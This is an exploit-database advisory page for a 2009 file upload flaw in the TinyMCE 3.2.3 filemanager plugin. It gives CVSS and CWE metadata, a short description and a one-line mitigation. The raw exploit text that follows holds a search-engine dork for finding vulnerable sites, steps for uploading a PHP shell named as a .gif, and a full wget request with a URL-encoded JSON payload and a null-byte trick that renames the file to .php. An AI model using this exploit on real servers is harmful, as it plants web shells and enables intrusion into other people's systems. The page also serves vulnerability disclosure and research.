File Upload Vulnerability [ Plugins tiny_mce ]

vendor:

TinyMCE

by:

Vladimir Vorontsov

8,8

CVSS

HIGH

File Upload Vulnerability

434

CWE

Product Name: TinyMCE

Affected Version From: 3.2.3

Affected Version To: 3.2.3

Patch Exists: YES

Related CWE: N/A

CPE: tinymce/plugins_filemanager

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

File Upload Vulnerability [ Plugins tiny_mce ]

A file upload vulnerability exists in the TinyMCE plugin, which allows an attacker to upload malicious files to the server. The vulnerability is due to the lack of proper input validation and sanitization of the uploaded files. An attacker can exploit this vulnerability by uploading a malicious file with a .gif extension, which can then be moved to a .php extension.

Mitigation:

Input validation and sanitization should be implemented to prevent malicious files from being uploaded.

Source

Exploit-DB raw data:

==============================================
File Upload Vulnerability [ Plugins tiny_mce ]
==============================================

http://tinymce.moxiecode.com/plugins_filemanager.php
Major version 3
Minor version 2.2.3

####################################################################

       Author             : Vladimir Vorontsov
       Contact            : d0znpp [at] gmail [dot] com

       Greetz       : GNU
       My Group         : ONSEC Russian Security Team

####################################################################

[~] DORK: inurl:/tiny_mce/plugins/filemanager/

--------------------------------------------------------------------

[~] You go to      :
http://web.com/tiny_mce/plugins/filemanager/pages/fm/index.html
[~] Upload shell   : use PHP content and .gif extension, in example a.gif
[~] Move it 2 .php :
 $ wget
--post-data="json_data=%7B%22method%22%3A%22fm.moveFiles%22%2C%22params%22%3A%5B%7B%22frompath0%22%3A%22%7B0%7D%2Fimages%2F
*a.gif*%22%2C%22toname0%22%3A%22*a.php%00.gif*%22%7D%5D%2C%22id%22%3A%22c0%22%7D"
 http://web.com/tiny_mce/plugins/filemanager/rpc/index.php

####################################################################